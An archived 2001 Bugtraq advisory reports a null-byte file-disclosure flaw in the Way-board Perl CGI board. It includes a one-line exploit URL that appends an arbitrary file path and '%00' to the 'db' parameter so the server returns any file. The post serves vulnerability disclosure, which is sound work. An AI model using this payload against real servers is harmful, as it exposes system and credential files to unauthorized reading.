[19140] in bugtraq
Way board: "show files" Vulnerability with null bite bug
daemon@ATHENA.MIT.EDU (UkR-XblP)
Mon Feb 12 16:44:16 2001
Mime-Version: 1.0
Content-Type: text/plain; charset="KOI8-R"
Content-Transfer-Encoding: 8bit
Message-Id: <web-16665433@backend2.aha.ru>
Date: Mon, 12 Feb 2001 17:16:44 +0300
Reply-To: UkR-XblP <cuctema@OK.RU>
From: UkR-XblP <cuctema@OK.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
Name: "show files" Vulnerability with perl null bite bug.
Date: 28.01.2001
About: Way-board - is a popular korean board
(http://way.co.kr - official site).
Problem: Through this bug you can see any files, bug works
on every system were perl is installed. "%00" - means hex
symbol of the end of the line, used in C,C++ and perl.
Author: UkR-XblP
Exploit:http://www.victim.com/way-board/way-board.cgi?db=url_to_any_file%00
Get your free e-mail address at http://www.zmail.ru